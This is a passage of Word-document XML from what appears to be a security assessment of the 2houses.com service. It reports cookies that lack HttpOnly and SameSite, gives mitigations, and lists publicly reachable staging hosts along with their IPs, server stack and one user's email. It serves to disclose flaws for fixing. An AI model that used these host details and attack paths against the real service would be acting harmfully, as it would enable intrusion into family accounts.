          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are readable by any script. These IDs are the primary keys used by the app's API. Any XSS turns into a cross-family IDOR starting point for free.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No SameSite.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Any request from any other origin carries these cookies. CSRF surface amplified; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>SameSite=Lax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be the default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1-year expiry on SSO cookies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistent cookie lifetime on an SSO token means the stolen value remains valid for a year. No rotation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The email in the cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_email=kotrotsos%40gmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) is a free PII leak to any script on any subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In a logged-in browser session on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, open DevTools and paste:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You will see all five named cookies including the SSO token and family ID, unescaped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add `HttpOnly` to every cookie that isn't specifically needed by JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_user_email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>current_family_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>single_sign_on_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set `SameSite=Lax`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the session cookies. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be safer but may break the SSO hand-off; test first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Don't expose family ID or user ID to the client at all.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server has the session; it doesn't need a cookie to tell itself who the user is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scope cookies to the narrowest host possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The SSO tokens don't need to be readable from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>blog.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; they only need to move between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Use same-host cookies (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>path=/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on each host) or a narrow parent like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>auth.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you must.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reduce token lifetime.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> One year is far too long for an SSO token that is readable by JavaScript. Rotate on login; invalidate server-side on logout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>har/full-walkthrough.har</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set-Cookie headers, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>findings/evidence/cookie-flags.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the redacted cookie inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-002 — Staging environments publicly accessible on the internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium → High (depends on staging data class)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposure / attack surface expansion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accounts-staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>landing.staging.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.staging.ldf.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmed 2026-04-22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subdomain enumeration (via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>hackertarget.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) reveals three staging hosts publicly resolving and responding:</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fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>IP / host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts-staging.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>18.185.93.209 (AWS eu-central-1, Frankfurt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>200 on `/en/users/sign_in`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Rails + Devise + Phusion Passenger 6.0.10 + Cloud66 (same as prod)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>landing.staging.2houses.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3.33.161.45 (AWS CloudFront)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>302 → `/en/`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (200 after)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2436"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
